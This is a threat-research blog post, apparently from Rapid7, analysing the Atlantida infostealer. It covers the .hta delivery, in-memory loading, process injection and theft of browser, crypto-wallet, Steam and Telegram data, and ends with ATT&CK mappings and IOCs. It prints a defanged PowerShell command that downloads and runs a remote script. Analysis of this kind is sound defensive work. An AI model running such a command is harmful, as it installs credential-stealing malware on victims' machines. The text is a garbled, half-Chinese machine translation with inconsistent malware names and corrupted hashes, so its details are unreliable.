Last updated at Tue, 27 Feb 2024 16:14:43 GMT
最近,Rapid7发现了一个名为亚特兰蒂斯的新窃贼. 窃取者诱骗用户从被入侵的网站下载恶意文件, 并使用了几种逃避技术,如反射加载和注入之前,偷窃者加载.
Atlantida窃取了Telegram等软件的大量登录信息, Steam, several offline cryptocurrency wallets data, 浏览器存储数据以及加密货币钱包浏览器扩展数据. 它还捕获受害者的屏幕并收集硬件数据.
Technical Analysis
Stage 1 - Delivery
The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, 我们观察到一个Visual Basic脚本解密一个硬编码的base64字符串并执行解密后的内容:
The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .
Stage 2 - Three levels of in-memory loading
执行的PowerShell命令在内存中下载并执行下一阶段的PowerShell脚本.
PowerShell脚本下载并反射加载a .NET downloader. The .NET downloader is a simple downloader that calls DownloadData API function to get a Donut injector. Donut 是一个位置无关的代码,使在内存中执行VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected to newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” by using a Remote Thread Injection Technique (aka CreateRemoteThread). 这种技术的工作方式是将shellcode写入另一个符合条件的进程的上下文中,并为该进程创建一个线程来运行负载.
Stage 3 - Atlantida Stealer
甜甜圈注入器用于装载最后的有效载荷,在我们的例子中是一架新的亚特兰大偷窃者. 它以可执行文件中的字符串命名.
首先,亚特兰大市窃取者通过使用组合来捕获整个屏幕 GetDC, CreateCompatibleDC,CreateDIBSection, SelectObject和BitBlt API function combination. Next, it checks if a Filezilla (open source FTP software, 允许用户将文件从本地计算机传输到远程计算机)最近的服务文件存在. It does that by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\ recentservers.xml” if it does, it reads the file. Next, 它通过枚举钱包路径下的文件来查找以下离线加密货币钱包:
窃取程序读取枚举路径下找到的所有文件.
接下来,它收集受害者的硬件数据,如RAM, GPU, CPU和屏幕分辨率. 窃取者列举用户的桌面文件夹并读取所有文本文件(.txt). 它还通过枚举“C:\Users\Username\AppData\Roaming\Binance”目录并读取其下的所有JSON文件来查找Binance钱包凭证.
Steam(电子游戏数字发行服务)的配置和凭证也在Atlantida stealer的兴趣中,因为我们观察到它列举了Steam配置目录并搜索以下文件:
- Ssfn - Steam Sentry File.
- Config.vdf - Steam configuration file.
- Loginusers.vdf -存储以前登录的Steam帐户的记录.
亚特兰蒂斯收集的最后一件事是电报的数据. 它收集位于“C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”中的所有数据。.
The stealer now connects to the hard coded C&C server (45.144.232.99). 我们访问了硬编码的IP并进入了登录页面我们认为是一个盗贼控制面板, which also had an `Atlantida` title.
No data is passed to the C&C服务器这次和小偷继续他的收集. Differently from other stealers, 亚特兰大只关注三种浏览器:谷歌Chrome, Mozilla Firefox and Microsoft Edge. 它窃取所有存储的密码,cookie,令牌,信用卡和自动填充.
其中一个值得注意的功能是它能够从基于chrome的浏览器扩展中窃取数据. 对于每个基于chrome的扩展,给出一个“扩展ID”. 恶意软件利用这些信息来获取存储在其中的数据. 亚特兰大从以下加密货币钱包扩展中收集数据:
Extension Name | Extension ID |
---|---|
Metamask | nkbihfbeogaeaoehlefnkodbefgpgknn |
Sollet | fhmfendgdocmcbmfikdcogofphimnkno |
BNB chain wallet | fhbohimaelbohpjbbldcngcnapndodjp |
Phantom | bfnaelmomeimhlpmgjnjophhpkkoljpa |
Metawallet | bkklifkecemccedpkhcebagjpehhabfb |
Yoroi | ffnbelfdoeiohenkjibnmadjiehjhajb |
Nami | lpfcbjknijpeeillifnkikgncikgfhdo |
Flint | hnhobjmcibchnmglfbldbfabcgaknlkj |
CardWallet | apnehcjmnengpnmccpaibjmhhoadaico |
Guildwallet | nanjmdknhkinifnkgdcggcfnhdaammmj |
TronWallet | pnndplcbkakcplkjnolgbkdgjikjednm |
CryptoAirdrops | dhgnlgphgchebgoemcjekedjjbifijid |
Bitoke | oijajbhmelbcoclnkdmembiacmeghbae |
Coin89 | aeachknmefphepccionboohckonoeemg |
XDefiWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf |
Keplr | dmkamcknogkgcdfhhbddcghachkejeap |
FreaksAxie | copjnifcecdedocejpaapepagaodgpbh |
Oasis | ppdadbejkmjnefldpcdjhnkpbjkikoip |
Rabby | acmacodkjbdgmoleebolmdjonilkdbch |
MathWallet | afbcbjpbpfadlkmhmclhkeeodmamcflc |
NiftyWallet | jbdaocneiiinmjbjlgalhcelgbejmnid |
Guarda | hpglfhgfnhbgpjdenjgmdgoeiappafln |
EQUALWallet | blnieiiffboillknjnepogjhkgnoapac |
BitAppWallet | fihkakfobkmkjojpchpfgcmhfjnmnfpi |
iWallet | kncchdigobghenbbaddojjnnaogfppfj |
Wombat | amkmjjmmflddogmhpjloimipbofnfjih |
MEW CX | nlbmnnijcnlegkjjpcfjclmcfggfefdm |
GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig |
Saturn Wallet | cphhlgmgameodnhkjdmkpanlelnlohao |
CloverWallet | nhnkbkgjikgcigadomkphalanndcapjk |
LiqualityWallet | kpfopkelmapcoipemfendmdcghnegimn |
TerraStation | aiifbnbfobpmeekipheeijimdpnlpgpp |
AuroWallet | cnmamaachppnkjgnildpdmkaakejnhae |
Polymesh Wallet | jojhfeoedkpkglbfimdfabpdfjaoolaf |
ICONex | flpiciilemghbmfalicajoolhkkenfel |
NaboxWallet | nknhiehlklippafakaeklbeglecifhad |
KHC | hcflpincpppdclinealmandijcmnkbgn |
Temple | ookjlbkiijinhpmnjffcofjonbfbgaoc |
TezBox | mnfifefkajgofkcjkemidiaecocnkjeh |
CyanoWallet | dkdedlpgdmmkkfjabffeganieamfklkm |
Byone | nlgbhdfgdhgbiamfdfmbikcdghidoadd |
OneKey | infeboajgfhgbjpjbeppbkgnabfdkdaf |
Leaf Wallet | cihmoadaighcejopammfbmddcmdekcje |
BitClip | ijmpgkjfkbfhoebgogflfebnmejmfbml |
NashExtension | onofpnbbkehpmmoabgpcpmigafmmnjhl |
HyconLiteClient | bcopgchhojmggmffilplmbdicgaihlkp |
当窃取者完成收集后,所有数据被压缩并发送到C&C server. Then the malware exists.
Rapid7 Customers
For Rapid7 MDR and InsightIDR customers, 以下攻击者行为分析(ABA)规则目前正在部署,并对本博客中描述的活动发出警报:
- Suspicious Process - MSHTA Spawns PowerShell
MITRE ATT&CK Techniques:
Tactic | Technique | **Details |
---|---|---|
Execution | User Execution: Malicious File (T1204.002) | A user downloads and executes malicious .hta file |
Execution | 命令和脚本解释器:Visual Basic (T1059).005) | .hta contains malicious VBScript function |
Execution | Command and Scripting Interpreter:Powershell (T1059.001) | VBScript执行powershell下载powershell脚本 |
Command and Control | Ingress Tool Transfer (T1105) | A powershell script downloads an additional .Net Loader |
Defense Evasion | Reflective Code Loading (T1620) | Powershell script executed the loader reflectively |
Defense Evasion | Process Injection (T1055) | The .Net loader injects into RegAsm.exe process |
Credential Access | 来自密码存储库的凭据:来自Web浏览器的凭据(T1555.003) | 亚特兰大窃取存储的浏览器数据,如密码,cookie,令牌,信用卡和自动填充 |
Credential Access | Credentials from Password Stores (T1555) | Atlantida窃取离线加密货币钱包数据和其他软件数据 |
Discovery | System Information Discovery (T1082) | Atlantida collects victim’s hardware information |
Collection | Screen Capture (T1113) | Atlantida captures victim’s screen |
Exfiltration | Exfiltration Over C2 Channel (T1041) | Atlantida exfiltrats all collected data |
IOCs
IOC | SHA-256 | Notes |
---|---|---|
ReadEra_v1.4.2.hta | 67年b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8 | Malicious .hta file |
http://166.1.160[.]10/loader.txt | Malicious powershell script | |
http://166.1.160[.]10/www_c.bin | f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3 | Stores .Net Loader |
http://166.1.160[.]10/www.bin | 350216884486 d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0 | Stores Donut shellcode |
AtlantidaStealer.exe | b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130 | Atlantida stealer |
45.144.232[.]99 | C&C server |